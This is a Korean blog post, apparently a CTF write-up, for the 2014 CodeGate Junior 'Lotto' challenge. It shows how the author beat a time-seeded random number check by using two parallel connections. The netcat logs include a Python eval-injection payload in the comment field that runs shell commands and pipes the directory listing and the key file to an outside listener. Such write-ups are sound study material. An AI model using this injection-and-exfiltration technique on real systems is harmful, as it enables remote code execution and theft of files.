상세 컨텐츠

본문 제목

2014 CodeGate Junior PreQual - Lotto

0x10 정보보안/0x15 System

by sweetchip 2014. 2. 16. 14:28

본문

반응형






invalid-file


C:\Users\Administrator>nc 58.229.183.27 7787

Welcome to lottery service


-------- the Hall of Fame --------

No one was win!

Good luck!

----------------------------------


Please pick 7 numbers in 1 to 45

Choice 1: 2

Choice 2: 7

Choice 3: 9

Choice 4: 15

Choice 5: 17

Choice 6: 18

Choice 7: 34

Congratulations!


We will record your name in the Hall of Fame!

Your name: sweetchip

Comment: __import__('os').system('dir|nc 220.117.247.200 12071')

__import__('os').system('cat key|nc 220.117.247.200 12071')

Thank you for your time


C:\Users\Administrator>nc -lvp 12071

listening on [any] 12071 ...

58.229.183.27: inverse host lookup failed: h_errno 11004: NO_DATA

connect to [192.168.0.93] from (UNKNOWN) [58.229.183.27] 37075: NO_DATA

examples.desktop key lotto.pyc





C:\Users\Administrator>nc 58.229.183.27 7787

Welcome to lottery service


-------- the Hall of Fame --------

No one was win!

Good luck!

----------------------------------


Please pick 7 numbers in 1 to 45

Choice 1: 5

Choice 2: 13

Choice 3: 15

Choice 4: 17

Choice 5: 19

Choice 6: 28

Choice 7: 41

Congratulations!


We will record your name in the Hall of Fame!

Your name: sweetchip

Comment: __import__('os').system('cat key|nc 220.117.247.200 12071')


Thank you for your time


C:\Users\Administrator>nc -lvp 12071

listening on [any] 12071 ...

58.229.183.27: inverse host lookup failed: h_errno 11004: NO_DATA

connect to [192.168.0.93] from (UNKNOWN) [58.229.183.27] 37076: NO_DATA

ProtiP_BO0ZE_TO_K1LL_HANGOVER



간단한 파이썬으로 작성된 문제이다.


무작위로 생성된 7개의 숫자를 맞추면 코멘트를 남길 수 있는 방식인데


여기서 간단하게 트릭을 사용할 수 있다.


랜덤값은 시간값을 베이스로 생성되는데 nc를 2개를 타닥 연결시키고 한개를 아무 숫자나 넣어주고 틀리면 정답이었던 숫자들이 출력되는데


이미 연결되었던 다른 nc에 똑같이 그 값을 입력하면 대부분 성공할 수 있었다.


문제 점수를 보면 아마 제작자의 의도는 이게 아니었을것으로 예상된다.


어쩃든 성공시키고 나면 eval 함수를 이용해서 명령을 시행하는데 적절하게 잘 해주면 키파일을 열 수 있다.


반응형

관련글 더보기